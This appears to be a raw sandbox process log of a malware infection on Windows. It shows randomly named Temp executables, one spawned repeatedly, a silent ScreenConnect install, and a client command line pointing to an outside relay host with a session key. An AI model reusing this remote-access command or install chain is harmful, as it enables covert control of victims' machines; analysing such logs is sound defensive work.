
C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe

"C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe"

C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe

"C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe"

C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding CE51BD9F7297D9F3E384E5340B875712 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI264B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240723578 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9FF11A8C874A3767102789C203F388A9

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 856F5DDD804D801542D02D11EFCE1C3F E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=feb3dc3c-6578-4232-a238-57d465576d77&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "4bd7e4bb-2cdd-4927-b869-4434b7a8b7ef" "User"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "30038d78-55a1-4c5d-a8b5-f28c1a0333a6" "System"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

